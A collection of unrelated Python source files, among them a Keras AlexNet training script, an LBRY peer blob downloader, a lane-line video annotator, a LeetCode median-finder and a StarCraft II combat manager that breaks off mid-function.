def _generate_json_file(column_names, rows, date_columns, date): json_content = [] for row in rows: json_obj = {column_name: row[column_idx] for column_idx, column_name in enumerate(column_names)} for date_column in date_columns: # Must manually convert Postgres dates to string to be compatible with JSON format json_obj[date_column] = datetime.strftime(json_obj[date_column], '%Y-%m-%d') json_content.append(json.dumps(json_obj)) json_content.append('') # Hack to get \n after the last JSON object json_file_content = ('\n'.join(json_content)).encode('utf8') info = tarfile.TarInfo(date.strftime('%Y-%m-%d') + '.json') info.size = len(json_file_content) info.mtime = time.time() return BytesIO(json_file_content), info def _generate_meta_file(columns, constraints, order_clauses, date_columns): if 'requestInDate' not in date_columns: date_columns += ['requestInDate'] meta_dict = {} meta_dict['descriptions'] = {field: FIELD_DESCRIPTIONS[field]['description'] for field in FIELD_DESCRIPTIONS} meta_dict['query'] = {'fields': columns, 'constraints': constraints, 'order_by': [' '.join(order_clause) for order_clause in order_clauses]} content = json.dumps(meta_dict).encode('utf8') info = tarfile.TarInfo('meta.json') info.size = len(content) info.mtime = time.time() return BytesIO(content), info def _gzip_content(content): output_bytes = BytesIO() with GzipFile(fileobj=output_bytes, mode='wb') as gzip_file: input_bytes = BytesIO(content.encode('utf8')) gzip_file.writelines(input_bytes) return output_bytes.getvalue()
python
import os.path from PIL import Image import json appdata_folder = os.path.join(os.environ["LOCALAPPDATA"], "Nightshift") def generate_wallpapers(day_img_path, night_img_path, step_count): print "Generating {0} images from {1} and {2} to {3}"\ .format(step_count, day_img_path, night_img_path, appdata_folder) if not os.path.exists(day_img_path) or not os.path.exists(night_img_path) \ or os.path.isdir(day_img_path) or os.path.isdir(night_img_path): raise IOError("Day image or night image not found.") _, day_ext = os.path.splitext(day_img_path) _, night_ext = os.path.splitext(night_img_path) if day_ext not in [".jpeg", ".jpg"] or night_ext not in [".jpeg", ".jpg"]: print "Images will be converted to .jpg." try: day_image = Image.open(day_img_path) night_image = Image.open(night_img_path) except IOError: print "Could not read image files." raise if day_image.size != night_image.size: print "The two wallpapers must be the same size." raise Exception("The two wallpapers must be the same size.") try: if not os.path.exists(appdata_folder): os.mkdir(appdata_folder) else: cleanup_old_wallpapers() blend_save_image(day_image, night_image, 0) for step in range(1, step_count + 1): opacity = step / float(step_count) blend_save_image(day_image, night_image, opacity) except: print "Could not generate wallpapers." raise try: output_file = open(os.path.join(appdata_folder, "images.json"), "w") json.dump({"step_count": step_count, "format": ".jpg"}, output_file) output_file.close() except IOError: print "Could not write image settings." raise print "Images generated correctly." def cleanup_old_wallpapers(): print "Cleaning up wallpaper directory." for item in os.listdir(appdata_folder): if item.endswith(".jpg"): os.remove(os.path.join(appdata_folder, item)) def blend_save_image(day_image, night_image, opacity): blended_image = Image.blend(day_image, night_image, opacity) blended_image.save(os.path.join(appdata_folder, format(int(opacity * 255), "03d") + ".jpg"), quality=95) blended_image.close() def get_wallpaper_params(): print "Getting saved wallpaper params." try: file_obj = open(os.path.join(appdata_folder, "images.json"), "r") result = json.load(file_obj) file_obj.close() return result except IOError: print "Could not read from wallpaper params file." print "Try generating the wallpaper images with" print "Nightshift.exe -g path_to_day_image path_to_night_image step_count" raise except: print "Could not get saved location." raise
python
""" adapted from keras example cifar10_cnn.py Train ResNet-18 on the CIFAR10 small images dataset. GPU run command with Theano backend (with TensorFlow, the GPU is automatically used): THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python cifar10.py """ from __future__ import print_function import tensorflow as tf config = tf.ConfigProto() config.gpu_options.allow_growth=True sess = tf.Session(config=config) from keras.preprocessing.image import ImageDataGenerator from keras.utils import np_utils from keras.callbacks import ReduceLROnPlateau, CSVLogger, EarlyStopping import tensorflow as tf import sys import datetime import os import shutil from keras.optimizers import Adam, Adadelta from convnets import AlexNet_FCN from datagenerator import data_gen import keras.backend as K import numpy as np import dataloader import datagenerator from keras.backend.tensorflow_backend import set_session from keras.metrics import top_k_categorical_accuracy def top_3_accuracy(y_true, y_pred): return top_k_categorical_accuracy(y_true, y_pred, k=3) set_session(sess) t = datetime.datetime.now().strftime("%Y%m%d%H%M%S") print(t) batch_size = 32 nb_classes = 14 nb_epoch = 100 outs = 31 data_augmentation = True # The data, shuffled and split between train and test sets: dataset_fn = '../../../data_preprocessing/material_dataset.txt' imgs_fn = '../../../../storage/center_227x227.npz' weights_fn = '../../../../storage/alexnet_weights.h5' #sz = 227 sz = 300 img_rows = sz img_cols = sz img_channels = 3 with tf.device('/gpu:0'): lr_reducer = ReduceLROnPlateau(factor=np.sqrt(0.1), cooldown=0, patience=5, min_lr=0.5e-6) early_stopper = EarlyStopping(min_delta=0.001, patience=10) csv_logger = CSVLogger('alexnet.csv') #model = resnet.ResnetBuilder.build_resnet_18((img_channels, img_rows, img_cols), nb_classes) #model = resnet.ResnetBuilder.build_resnet_50((img_channels, img_rows, img_cols), nb_classes) model, outs = AlexNet_FCN(nb_classes=nb_classes, sz=sz) #model = AlexNet(weights_fn, nb_classes=nb_classes, sz=sz) #model = AlexNet(weights_fn, nb_classes=nb_classes) print("outs", outs) #opt = Adadelta(lr=0.01, rho=0.95, epsilon=1e-08, decay=0.0) #opt = Adadelta(lr=1, rho=0.95, epsilon=1e-08, decay=0.0) def sum_loss(y_true, y_pred): y_true = K.reshape(y_true, [batch_size*outs*outs, nb_classes]) y_pred = K.reshape(y_pred, [batch_size*outs*outs, nb_classes]) s = K.mean(K.categorical_crossentropy(y_true, y_pred)) return s opt = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0) model.compile(#loss='categorical_crossentropy', loss=sum_loss, optimizer=opt, #metrics=['accuracy', top_3_accuracy]) metrics=['accuracy']) if data_augmentation: print('Using real-time data augmentation.') # This will do preprocessing and realtime data augmentation: r = 0.2 datagen = ImageDataGenerator(featurewise_center=False, samplewise_center=False, featurewise_std_normalization=False, samplewise_std_normalization=False, zca_whitening=False, rotation_range=r*100, width_shift_range=r, height_shift_range=r, shear_range=r, zoom_range=r, channel_shift_range=r, fill_mode='nearest', cval=0., horizontal_flip=True, vertical_flip=False, rescale=None, preprocessing_function=None) # Compute quantities required for featurewise normalization # (std, mean, and principal components if ZCA whitening is applied). #datagen.fit(X_train) def print_log(y_pred, Z, log_fn, k=5): fout = open(log_fn, 'w') acc1 = 0 acc3 = 0 cnt = 0 for i in range(0, len(y_pred), k): img_fn = Z[i][0] label = Z[i][1] loc = Z[i][2] print(img_fn, label, end=' ', file=fout) y_sum = np.sum(y_pred[i:i+k], axis=0) y_sum = np.sum(np.sum(y_sum, axis=0), axis=0) y = [(j, y_sum[j]) for j in range(nb_classes)] y_sorted = sorted(y, key=lambda d:d[1], reverse=True) for j in y_sorted[:5]: print(j[0], end=' ', file=fout) print("", file=fout) if y_sorted[0][0] == label: acc1 += 1 if y_sorted[0][0] == label or y_sorted[1][0] == label or y_sorted[2][0] == label: acc3 += 1 y_sum = np.zeros_like(y_pred[0]) cnt += 1 fout.close() return acc1 * 1.0 / cnt, acc3 * 1.0 / cnt def predict(model, val=True): y_preds = [] Z = [] for (x, y, z) in datagenerator.test_generator(dataset_fn, imgs_fn, val=val, sz=img_rows): y_pred = model.predict(x, batch_size=batch_size) y_preds.append(y_pred) Z = Z + z y_preds = np.vstack(y_preds) return y_preds, Z log_dir = '../../../../result/alexnet/{}/'.format(t) os.mkdir(log_dir) shutil.copy('./fabric_train.py', log_dir+'fabric_train.py') shutil.copy('./convnets.py', log_dir+'convnets.py') G = data_gen('../../../data_preprocessing/material_dataset.txt', batch_size=batch_size, datagen=datagen, sz=sz, outs=outs) # Fit the model on the batches generated by datagen.flow(). for epochs in range(nb_epoch): model.fit_generator(#datagen.flow(X_train, Y_train, batch_size=batch_size), #steps_per_epoch=X_train.shape[0] // batch_size, G, steps_per_epoch=500, epochs=1, verbose=1, max_q_size=100) #y_pred_valid = model.predict(X_valid, batch_size=batch_size) #y_pred_test = model.predict(X_test, batch_size=batch_size) y_pred_valid, Z_valid = predict(model, val=True) y_pred_test, Z_test = predict(model, val=False) k = 1 log_fn = log_dir + '.tmp.txt' val_acc = print_log(y_pred_valid, Z_valid, log_fn, k=k) test_acc = print_log(y_pred_test, Z_test, log_fn, k=k) log_fn = log_dir + 'val_{:02d}'.format(epochs) + '_{:.4f}_{:.4f}'.format(val_acc[1], test_acc[1]) + '.txt' print_log(y_pred_valid, Z_valid, log_fn, k=k) log_fn = log_dir + '{:02d}'.format(epochs) + '_{:.4f}_{:.4f}'.format(val_acc[1], test_acc[1]) + '.txt' print_log(y_pred_test, Z_test, log_fn, k=k) print(epochs, val_acc, test_acc)
python
class MiscUtils: def __init__(self): import requests import json r = requests.get("https://backpack.tf/filters") obj = json.loads(r.text) particles = obj['particle'] qualities = obj['quality'] rarities = obj['rarity'] paints = obj['paint'] origins = obj['origin'] wear_tiers = obj['wear_tiers'] killstreakers = obj['killstreakers'] sheens = obj['sheens'] killstreak_tiers = obj['killstreak_tiers'] strange_parts = obj['strange_parts'] self.particleObj = {} self.qualitiesObj = {} self.raritiesObj = {} self.paintsObj = {} self.originsObj = {} self.wear_tiersObj = {} self.killstreakers = {} self.sheensObj = {} self.killstreak_tiers = {} self.strange_partsObj = {} for particle in particles: self.particleObj[particle['name'].lower()] = int(particle['id']) for quality in qualities: self.qualitiesObj[quality['name'].lower()] = int(quality['id']) for rarity in rarities: self.raritiesObj[rarity['name'].lower()] = int(rarity['id']) for paint in paints: self.paintsObj[paint['name'].lower()] = int(paint['id']) for particle in origins: self.originsObj[particle['name'].lower()] = int(particle['id']) for particle in wear_tiers: self.wear_tiersObj[wear_tiers[particle]['name'].lower()] = int(wear_tiers[particle]['id']) for particle in killstreakers: self.killstreakers[particle['name'].lower()] = int(particle['id']) for particle in sheens: self.sheensObj[particle['name'].lower()] = int(particle['id']) for particle in killstreak_tiers: self.killstreak_tiers[particle['name'].lower()] = int(particle['id']) for particle in strange_parts: self.strange_partsObj[particle['name'].lower()] = int(particle['id']) # # Converts quality string to quality int # def quality_String_To_Int(self, string): try: return self.qualitiesObj[string.lower()] except: return "" # # Converts particle string to particle int # def particle_String_To_Int(self, string): try: return self.particleObj[string.lower()] except: return "" # # Converts rarity string to rarity int # def rarity_String_To_Int(self, string): try: return self.raritiesObj[string.lower()] except: return "" # # Origin quality string to origin int # def origin_String_To_Int(self, string): try: return self.originsObj[string.lower()] except: return "" # # Converts wear_tier string to wear_tier int # def wear_tier_String_To_Int(self, string): try: return self.wear_tiersObj[string.lower()] except: return "" # # Converts killstreaker string to killstreaker int # def killstreaker_String_To_Int(self, string): try: return self.killstreakers[string.lower()] except: return "" # # Converts sheen string to sheen int # def sheen_String_To_Int(self, string): try: return self.sheensObj[string.lower()] except: return "" # # Converts killstreak_tier string to killstreak_tier int # def killstreak_tier_String_To_Int(self, string): try: return self.killstreak_tiers[string.lower()] except: return "" # # Converts strange_part string to strange_part int # def strange_parts_String_To_Int(self, string): try: return self.strange_partsObj[string.lower()] except: return "" # # Converts paint string to paint int # def paint_String_To_Int(self, string): try: return self.paintsObj[string.lower()] except: return "" # # Converts steam ID into the account_id account ID is used in trading requests # def steam_id_to_account_id(self, steam_id): import struct return str(struct.unpack('>L', int(steam_id).to_bytes(8, byteorder='big')[4:])[0])
python
import asyncio import typing import logging from lbrynet.utils import drain_tasks from lbrynet.blob_exchange.client import request_blob if typing.TYPE_CHECKING: from lbrynet.conf import Config from lbrynet.dht.node import Node from lbrynet.dht.peer import KademliaPeer from lbrynet.blob.blob_manager import BlobFileManager from lbrynet.blob.blob_file import BlobFile log = logging.getLogger(__name__) class BlobDownloader: BAN_TIME = 10.0 # fixme: when connection manager gets implemented, move it out from here def __init__(self, loop: asyncio.BaseEventLoop, config: 'Config', blob_manager: 'BlobFileManager', peer_queue: asyncio.Queue): self.loop = loop self.config = config self.blob_manager = blob_manager self.peer_queue = peer_queue self.active_connections: typing.Dict['KademliaPeer', asyncio.Task] = {} # active request_blob calls self.ignored: typing.Dict['KademliaPeer', int] = {} self.scores: typing.Dict['KademliaPeer', int] = {} self.connections: typing.Dict['KademliaPeer', asyncio.Transport] = {} self.time_since_last_blob = loop.time() def should_race_continue(self, blob: 'BlobFile'): if len(self.active_connections) >= self.config.max_connections_per_download: return False # if a peer won 3 or more blob races and is active as a downloader, stop the race so bandwidth improves # the safe net side is that any failure will reset the peer score, triggering the race back # TODO: this is a good idea for low bandwidth, but doesnt play nice on high bandwidth # for peer, task in self.active_connections.items(): # if self.scores.get(peer, 0) >= 0 and self.rounds_won.get(peer, 0) >= 3 and not task.done(): # return False return not (blob.get_is_verified() or blob.file_exists) async def request_blob_from_peer(self, blob: 'BlobFile', peer: 'KademliaPeer'): if blob.get_is_verified(): return self.scores[peer] = self.scores.get(peer, 0) - 1 # starts losing score, to account for cancelled ones transport = self.connections.get(peer) start = self.loop.time() bytes_received, transport = await request_blob( self.loop, blob, peer.address, peer.tcp_port, self.config.peer_connect_timeout, self.config.blob_download_timeout, connected_transport=transport ) if bytes_received == blob.get_length(): self.time_since_last_blob = self.loop.time() if not transport and peer not in self.ignored: self.ignored[peer] = self.loop.time() log.debug("drop peer %s:%i", peer.address, peer.tcp_port) if peer in self.connections: del self.connections[peer] elif transport: log.debug("keep peer %s:%i", peer.address, peer.tcp_port) self.connections[peer] = transport rough_speed = (bytes_received / (self.loop.time() - start)) if bytes_received else 0 self.scores[peer] = rough_speed async def new_peer_or_finished(self, blob: 'BlobFile'): async def get_and_re_add_peers(): try: new_peers = await asyncio.wait_for(self.peer_queue.get(), timeout=1.0) self.peer_queue.put_nowait(new_peers) except asyncio.TimeoutError: pass tasks = [self.loop.create_task(get_and_re_add_peers()), self.loop.create_task(blob.verified.wait())] active_tasks = list(self.active_connections.values()) try: await asyncio.wait(tasks + active_tasks, loop=self.loop, return_when='FIRST_COMPLETED') finally: drain_tasks(tasks) def cleanup_active(self): to_remove = [peer for (peer, task) in self.active_connections.items() if task.done()] for peer in to_remove: del self.active_connections[peer] def clearbanned(self): now = self.loop.time() if now - self.time_since_last_blob > 60.0: return forgiven = [banned_peer for banned_peer, when in self.ignored.items() if now - when > self.BAN_TIME] self.peer_queue.put_nowait(forgiven) for banned_peer in forgiven: self.ignored.pop(banned_peer) async def download_blob(self, blob_hash: str, length: typing.Optional[int] = None) -> 'BlobFile': blob = self.blob_manager.get_blob(blob_hash, length) if blob.get_is_verified(): return blob try: while not blob.get_is_verified(): batch: typing.List['KademliaPeer'] = [] while not self.peer_queue.empty(): batch.extend(self.peer_queue.get_nowait()) batch.sort(key=lambda peer: self.scores.get(peer, 0), reverse=True) log.debug( "running, %d peers, %d ignored, %d active", len(batch), len(self.ignored), len(self.active_connections) ) for peer in batch: if not self.should_race_continue(blob): break if peer not in self.active_connections and peer not in self.ignored: log.debug("request %s from %s:%i", blob_hash[:8], peer.address, peer.tcp_port) t = self.loop.create_task(self.request_blob_from_peer(blob, peer)) self.active_connections[peer] = t await self.new_peer_or_finished(blob) self.cleanup_active() if batch: self.peer_queue.put_nowait(set(batch).difference(self.ignored)) else: self.clearbanned() blob.close() log.debug("downloaded %s", blob_hash[:8]) return blob finally: while self.active_connections: self.active_connections.popitem()[1].cancel() def close(self): self.scores.clear() self.ignored.clear() for transport in self.connections.values(): transport.close() async def download_blob(loop, config: 'Config', blob_manager: 'BlobFileManager', node: 'Node', blob_hash: str) -> 'BlobFile': search_queue = asyncio.Queue(loop=loop, maxsize=config.max_connections_per_download) search_queue.put_nowait(blob_hash) peer_queue, accumulate_task = node.accumulate_peers(search_queue) downloader = BlobDownloader(loop, config, blob_manager, peer_queue) try: return await downloader.download_blob(blob_hash) finally: if accumulate_task and not accumulate_task.done(): accumulate_task.cancel() downloader.close()
python
import grpc from pkg.api.python import api_pb2 from pkg.api.python import api_pb2_grpc from pkg.suggestion.test_func import func from pkg.suggestion.types import DEFAULT_PORT def run(): channel = grpc.insecure_channel(DEFAULT_PORT) stub = api_pb2_grpc.SuggestionStub(channel) set_param_response = stub.SetSuggestionParameters(api_pb2.SetSuggestionParametersRequest( study_id="1", suggestion_parameters=[ api_pb2.SuggestionParameter( name="N", value="100", ), api_pb2.SuggestionParameter( name="kernel_type", value="matern", ), api_pb2.SuggestionParameter( name="mode", value="ei", ), api_pb2.SuggestionParameter( name="trade_off", value="0.01", ), api_pb2.SuggestionParameter( name="model_type", value="gp", ), api_pb2.SuggestionParameter( name="n_estimators", value="50", ), ] )) completed_trials = [] maximum = -1 iter = 0 for i in range(30): response = stub.GenerateTrials(api_pb2.GenerateTrialsRequest( study_id="1", configs=api_pb2.StudyConfig( name="test_study", owner="me", optimization_type=api_pb2.MAXIMIZE, optimization_goal=0.2, parameter_configs=api_pb2.StudyConfig.ParameterConfigs( configs=[ # api_pb2.ParameterConfig( # name="param1", # parameter_type=api_pb2.INT, # feasible=api_pb2.FeasibleSpace(max="5", min="1", list=[]), # ), # api_pb2.ParameterConfig( # name="param2", # parameter_type=api_pb2.CATEGORICAL, # feasible=api_pb2.FeasibleSpace(max=None, min=None, list=["cat1", "cat2", "cat3"]) # ), # api_pb2.ParameterConfig( # name="param3", # parameter_type=api_pb2.DISCRETE, # feasible=api_pb2.FeasibleSpace(max=None, min=None, list=["3", "2", "6"]) # ), # api_pb2.ParameterConfig( # name="param4", # parameter_type=api_pb2.DOUBLE, # feasible=api_pb2.FeasibleSpace(max="5", min="1", list=[]) # ) api_pb2.ParameterConfig( name="param1", parameter_type=api_pb2.DOUBLE, feasible=api_pb2.FeasibleSpace(max="1", min="0", list=[]), ), api_pb2.ParameterConfig( name="param2", parameter_type=api_pb2.DOUBLE, feasible=api_pb2.FeasibleSpace(max="1", min="0", list=[]) ), ], ), access_permissions=[], suggest_algorithm="BO", autostop_algorithm="", study_task_name="task", suggestion_parameters=[], tags=[], objective_value_name="precision", metrics=[], image="", command=["", ""], gpu=0, scheduler="", mount=api_pb2.MountConf( pvc="", path="", ), pull_secret="" ), completed_trials=completed_trials, running_trials=[],) ) x1 = response.trials[0].parameter_set[0].value x2 = response.trials[0].parameter_set[1].value objective_value = func(float(x1), float(x2)) if objective_value > maximum: maximum = objective_value iter = i print(objective_value) completed_trials.append(api_pb2.Trial( trial_id=response.trials[0].trial_id, study_id="1", status=api_pb2.COMPLETED, eval_logs=[], objective_value=str(objective_value), parameter_set=[ api_pb2.Parameter( name="param1", parameter_type=api_pb2.DOUBLE, value=x1, ), api_pb2.Parameter( name="param2", parameter_type=api_pb2.DOUBLE, value=x2, ), ] )) print(str(response.trials[0].parameter_set)) stop_study_response = stub.StopSuggestion(api_pb2.StopStudyRequest( study_id="1" )) print("found the maximum: {} at {} iteration".format(maximum, iter)) if __name__ == "__main__": run()
python
# -*- coding: utf-8 -*- # @Time: 2020/10/10 11:58 # @Author: GraceKoo # @File: interview_63.py # @Desc: https://leetcode-cn.com/problems/shu-ju-liu-zhong-de-zhong-wei-shu-lcof/ from heapq import * class MedianFinder: def __init__(self): """ initialize your data structure here. """ self.A = [] # 大顶堆,存放较小的元素 self.B = [] # 小顶堆,存放较大的元素,使得B的最小的元素也比A中最大的元素大,保证数据流保持有序 def addNum(self, num: int) -> None: # 数据流长度为奇数时,需向A中插入元素:先向B中插入num,再将B的堆顶元素插入至A,保证B比A大 if len(self.A) != len(self.B): heappush(self.B, num) heappush(self.A, -heappop(self.B)) # 数据流长度为偶数时,需向B中插入元素:先向A中插入num,再将A的堆顶元素插入至B,保证B比A大 else: heappush(self.A, -num) heappush(self.B, -heappop(self.A)) def findMedian(self) -> float: if len(self.A) != len(self.B): return self.B[0] else: return (-self.A[0] + self.B[0]) / 2.0 # Your MedianFinder object will be instantiated and called as such: # obj = MedianFinder() # obj.addNum(num) # param_2 = obj.findMedian()
python
import pytest from pytest_cases.case_parametrizer_legacy import get_pytest_marks_on_function, make_marked_parameter_value def test_get_pytest_marks(): """ Tests that we are able to correctly retrieve the marks on case_func :return: """ skip_mark = pytest.mark.skipif(True, reason="why") @skip_mark def case_func(): pass # extract the marks from a case function marks = get_pytest_marks_on_function(case_func, as_decorators=True) # check that the mark is the same than a manually made one assert len(marks) == 1 assert str(marks[0]) == str(skip_mark) # transform a parameter into a marked parameter dummy_case = (1, 2, 3) marked_param = make_marked_parameter_value((dummy_case,), marks=marks)
python
from Game import game class MyClass(object): gamenew = game() def executegame(self): self.gamenew.gamce() print 'test' if __name__ == '__main__': a = MyClass() a.executegame()
python
import numpy as np import cv2 import matplotlib.pyplot as plt import matplotlib.image as mpimg import pickle from combined_thresh import combined_thresh from perspective_transform import perspective_transform from Line import Line from line_fit import line_fit, tune_fit, final_viz, calc_curve, calc_vehicle_offset, viz2 from moviepy.editor import VideoFileClip # Global variables (just to make the moviepy video annotation work) with open('calibrate_camera.p', 'rb') as f: save_dict = pickle.load(f) mtx = save_dict['mtx'] dist = save_dict['dist'] window_size = 5 # how many frames for line smoothing left_line = Line(n=window_size) right_line = Line(n=window_size) detected = False # did the fast line fit detect the lines? left_curve, right_curve = 0., 0. # radius of curvature for left and right lanes left_lane_inds, right_lane_inds = None, None # for calculating curvature frameCount = 0 retLast = {} # MoviePy video annotation will call this function def annotate_image(img_in): """ Annotate the input image with lane line markings Returns annotated image """ global mtx, dist, left_line, right_line, detected, frameCount, retLast global left_curve, right_curve, left_lane_inds, right_lane_inds frameCount += 1 src = np.float32( [[200, 720], [1100, 720], [520, 500], [760, 500]]) x = [src[0, 0], src[1, 0], src[3, 0], src[2, 0], src[0, 0]] y = [src[0, 1], src[1, 1], src[3, 1], src[2, 1], src[0, 1]] # Undistort, threshold, perspective transform undist = cv2.undistort(img_in, mtx, dist, None, mtx) img, abs_bin, mag_bin, dir_bin, hls_bin = combined_thresh(undist) binary_warped, binary_unwarped, m, m_inv = perspective_transform(img) # Perform polynomial fit if not detected: # Slow line fit ret = line_fit(binary_warped) # if detect no lanes, use last result instead. if len(ret) == 0: ret = retLast left_fit = ret['left_fit'] right_fit = ret['right_fit'] nonzerox = ret['nonzerox'] nonzeroy = ret['nonzeroy'] out_img = ret['out_img'] left_lane_inds = ret['left_lane_inds'] right_lane_inds = ret['right_lane_inds'] histogram = ret['histo'] # Get moving average of line fit coefficients left_fit = left_line.add_fit(left_fit) right_fit = right_line.add_fit(right_fit) # Calculate curvature left_curve, right_curve = calc_curve(left_lane_inds, right_lane_inds, nonzerox, nonzeroy) detected = True # slow line fit always detects the line else: # implies detected == True # Fast line fit left_fit = left_line.get_fit() right_fit = right_line.get_fit() ret = tune_fit(binary_warped, left_fit, right_fit) left_fit = ret['left_fit'] right_fit = ret['right_fit'] nonzerox = ret['nonzerox'] nonzeroy = ret['nonzeroy'] left_lane_inds = ret['left_lane_inds'] right_lane_inds = ret['right_lane_inds'] # Only make updates if we detected lines in current frame if ret is not None: left_fit = ret['left_fit'] right_fit = ret['right_fit'] nonzerox = ret['nonzerox'] nonzeroy = ret['nonzeroy'] left_lane_inds = ret['left_lane_inds'] right_lane_inds = ret['right_lane_inds'] left_fit = left_line.add_fit(left_fit) right_fit = right_line.add_fit(right_fit) left_curve, right_curve = calc_curve(left_lane_inds, right_lane_inds, nonzerox, nonzeroy) else: detected = False vehicle_offset = calc_vehicle_offset(undist, left_fit, right_fit) # Perform final visualization on top of original undistorted image result = final_viz(undist, left_fit, right_fit, m_inv, left_curve, right_curve, vehicle_offset) retLast = ret save_viz2 = './output_images/polyfit_test%d.jpg' % (frameCount) viz2(binary_warped, ret, save_viz2) save_warped = './output_images/warped_test%d.jpg' % (frameCount) plt.imshow(binary_warped, cmap='gray', vmin=0, vmax=1) if save_warped is None: plt.show() else: plt.savefig(save_warped) plt.gcf().clear() save_binary = './output_images/binary_test%d.jpg' % (frameCount) plt.imshow(img, cmap='gray', vmin=0, vmax=1) if save_binary is None: plt.show() else: plt.savefig(save_binary) plt.gcf().clear() if frameCount > 0: fig = plt.gcf() fig.set_size_inches(16.5, 8.5) plt.subplot(2, 3, 1) plt.imshow(undist) # plt.plot(undist) plt.plot(x, y) plt.title('undist') plt.subplot(2, 3, 2) plt.imshow(hls_bin, cmap='gray', vmin=0, vmax=1) plt.title('hls_bin') plt.subplot(2, 3, 3) plt.imshow(abs_bin, cmap='gray', vmin=0, vmax=1) plt.title('abs_bin') plt.subplot(2, 3, 4) plt.imshow(img, cmap='gray', vmin=0, vmax=1) plt.title('img') plt.subplot(2, 3, 5) plt.imshow(out_img) plt.title('out_img') plt.subplot(2, 3, 6) plt.imshow(result, cmap='gray', vmin=0, vmax=1) plt.title('result') save_result = 'D:/code/github_code/CarND-Advanced-Lane-Lines-P4/output_images/result-test%d.jpg' % (frameCount) if save_result is None: plt.show() else: plt.savefig(save_result) plt.gcf().clear() return result def annotate_video(input_file, output_file): """ Given input_file video, save annotated video to output_file """ video = VideoFileClip(input_file) annotated_video = video.fl_image(annotate_image) annotated_video.write_videofile(output_file, audio=False) if __name__ == '__main__': # Annotate the video # annotate_video('challenge_video.mp4', 'challenge_video_out.mp4') # Show example annotated image on screen for sanity check for i in range (1, 7): img_file = 'test_images/test%d.jpg' % (i) img = mpimg.imread(img_file) result = annotate_image(img) plt.imshow(result) save_file = 'D:/code/github_code/CarND-Advanced-Lane-Lines-P4/output_images/test%d.jpg' % (i) if save_file is None: plt.show() else: plt.savefig(save_file) plt.gcf().clear()
python
from typing import List, Dict, Optional, Union from sharpy.combat import * from sharpy.general.extended_power import ExtendedPower from sharpy.interfaces import ICombatManager from sharpy.managers.core import UnitCacheManager, PathingManager, ManagerBase from sharpy.combat import Action from sc2.units import Units from sc2 import UnitTypeId from sc2.position import Point2, Point3 from sc2.unit import Unit import numpy as np from sklearn.cluster import DBSCAN ignored = {UnitTypeId.MULE, UnitTypeId.LARVA, UnitTypeId.EGG} class GroupCombatManager(ManagerBase, ICombatManager): rules: MicroRules def __init__(self): super().__init__() self.default_rules = MicroRules() self.default_rules.load_default_methods() self.default_rules.load_default_micro() self.enemy_group_distance = 7 async def start(self, knowledge: "Knowledge"): await super().start(knowledge) self.cache: UnitCacheManager = self.knowledge.unit_cache self.pather: PathingManager = self.knowledge.pathing_manager self._tags: List[int] = [] self.all_enemy_power = ExtendedPower(self.unit_values) await self.default_rules.start(knowledge) @property def tags(self) -> List[int]: return self._tags @property def regroup_threshold(self) -> float: """ Percentage 0 - 1 on how many of the attacking units should actually be together when attacking""" return self.rules.regroup_percentage @property def own_group_threshold(self) -> float: """ How much distance must be between units to consider them to be in different groups """ return self.rules.own_group_distance @property def unit_micros(self) -> Dict[UnitTypeId, MicroStep]: return self.rules.unit_micros @property def generic_micro(self) -> MicroStep: return self.rules.generic_micro async def update(self): self.enemy_groups: List[CombatUnits] = self.group_enemy_units() self.all_enemy_power.clear() for group in self.enemy_groups: # type: CombatUnits self.all_enemy_power.add_units(group.units) async def post_update(self): pass @property def debug(self): return self._debug and self.knowledge.debug def add_unit(self, unit: Unit): if unit.type_id in ignored: # Just no return self._tags.append(unit.tag) def add_units(self, units: Units): for unit in units: self.add_unit(unit) def get_all_units(self) -> Units: units = Units([], self.ai) for tag in self._tags: unit = self.cache.by_tag(tag) if unit: units.append(unit) return units def execute(self, target: Point2, move_type=MoveType.Assault, rules: Optional[MicroRules] = None): our_units = self.get_all_units() if len(our_units) < 1: return self.rules = rules if rules else self.default_rules self.own_groups: List[CombatUnits] = self.group_own_units(our_units) if self.debug: fn = lambda group: group.center.distance_to(self.ai.start_location) sorted_list = sorted(self.own_groups, key=fn) for i in range(0, len(sorted_list)): sorted_list[i].debug_index = i self.rules.handle_groups_func(self, target, move_type) self._tags.clear() def faster_group_should_regroup(self, group1: CombatUnits, group2: Optional[CombatUnits]) -> bool: if not group2: return False if group1.average_speed < group2.average_speed + 0.1: return False # Our group is faster, it's a good idea to regroup return True def regroup(self, group: CombatUnits, target: Union[Unit, Point2]): if isinstance(target, Unit): target = self.pather.find_path(group.center, target.position, 1) else: target = self.pather.find_path(group.center, target, 3) self.move_to(group, target, MoveType.Push) def move_to(self, group: CombatUnits, target, move_type: MoveType): self.action_to(group, target, move_type, False) def attack_to(self, group: CombatUnits, target, move_type: MoveType): self.action_to(group, target, move_type, True) def action_to(self, group: CombatUnits, target, move_type: MoveType, is_attack: bool): original_target = target if isinstance(target, Point2) and group.ground_units: if move_type in {MoveType.DefensiveRetreat, MoveType.PanicRetreat}: target = self.pather.find_influence_ground_path(group.center, target, 14) else: target = self.pather.find_path(group.center, target, 14) own_unit_cache: Dict[UnitTypeId, Units] = {} for unit in group.units: real_type = self.unit_values.real_type(unit.type_id) units = own_unit_cache.get(real_type, Units([], self.ai)) if units.amount == 0: own_unit_cache[real_type] = units units.append(unit) for type_id, type_units in own_unit_cache.items(): micro: MicroStep = self.unit_micros.get(type_id, self.generic_micro) micro.init_group(self.rules, group, type_units, self.enemy_groups, move_type, original_target) group_action = micro.group_solve_combat(type_units, Action(target, is_attack)) for unit in type_units: final_action = micro.unit_solve_combat(unit, group_action) final_action.to_commmand(unit) if self.debug: if final_action.debug_comment: status = final_action.debug_comment elif final_action.ability: status = final_action.ability.name elif final_action.is_attack: status = "Attack" else: status = "Move" if final_action.target is not None: if isinstance(final_action.target, Unit): status += f": {final_action.target.type_id.name}" else: status += f": {final_action.target}" status += f" G: {group.debug_index}" status += f"\n{move_type.name}" pos3d: Point3 = unit.position3d pos3d = Point3((pos3d.x, pos3d.y, pos3d.z + 2)) self.ai._client.debug_text_world(status, pos3d, size=10) def closest_group( self, start: Point2, combat_groups: List[CombatUnits], group_center: Optional[Point2] = None, distance: float = 50, ) -> Optional[CombatUnits]: group = None best_distance = distance # doesn't find enemy groups closer than this if group_center is None: group_center = start for combat_group in combat_groups: center = combat_group.center if center == group_center: continue # it's the same group! distance = start.distance_to(center) if distance < best_distance: best_distance = distance group = combat_group return group def group_own_units(self, units: Units) -> List[CombatUnits]: groups: 